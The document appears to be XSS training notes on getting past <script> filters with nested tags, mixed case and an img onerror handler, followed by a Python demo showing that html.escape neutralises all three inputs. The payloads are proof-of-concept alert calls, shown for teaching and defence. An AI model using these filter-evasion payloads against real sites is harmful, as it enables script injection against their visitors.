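Method 1: bypass the <script> filter by double-writing (nesting) the tag
Input <sc<script>ript>alert(/xss/)</script>; the alert box pops up.
Method 2: bypass the <script> filter with mixed case
Input <ScRipt>alert(/xss/)</script>; the alert box pops up.
Method 1: use the onerror attribute of an img tag to bypass a filter that removes <script> even when its case is mixed
Input <img src=1 onerror=alert(/xss/)>; the alert box pops up.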
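Why each of these inputs gets through, and what stops all three: an added example, not code from the original page. The two stripping filters are assumed stand-ins for the filters the page is bypassing (their source is not shown here); the fix shown is output encoding with Python's html.escape.

```python
import html
import re
from html.parser import HTMLParser

# The three inputs quoted on this page.
PAYLOADS = [
    "<sc<script>ript>alert(/xss/)</script>",
    "<ScRipt>alert(/xss/)</script>",
    "<img src=1 onerror=alert(/xss/)>",
]

def strip_once(value):
    # Assumed filter A: one case-sensitive pass removing "<script>".
    return value.replace("<script>", "")

def strip_all(value):
    # Assumed filter B: case-insensitive removal, repeated until nothing changes.
    previous = None
    while previous != value:
        previous, value = value, re.sub(r"<script>", "", value, flags=re.I)
    return value

def encode(value):
    # Fix for HTML body/attribute output: encode the input instead of stripping it.
    return html.escape(value, quote=True)

class ActiveMarkupFinder(HTMLParser):
    """Records <script> start tags and on* event-handler attributes."""
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script")
        self.hits.extend(name for name, _ in attrs if name.startswith("on"))

def active_markup(fragment):
    finder = ActiveMarkupFinder()
    finder.feed(fragment)
    finder.close()
    return finder.hits

def survivors(sanitize):
    # For each page payload, the executable markup left after sanitizing.
    return [active_markup(sanitize(p)) for p in PAYLOADS]

if __name__ == "__main__":
    for fn in (strip_once, strip_all, encode):
        print(f"{fn.__name__:10}", survivors(fn))
```

Filter A reassembles the nested tag into a working <script>, filter B still lets the event-handler attribute through, and only encoding leaves no active markup for any of the three inputs.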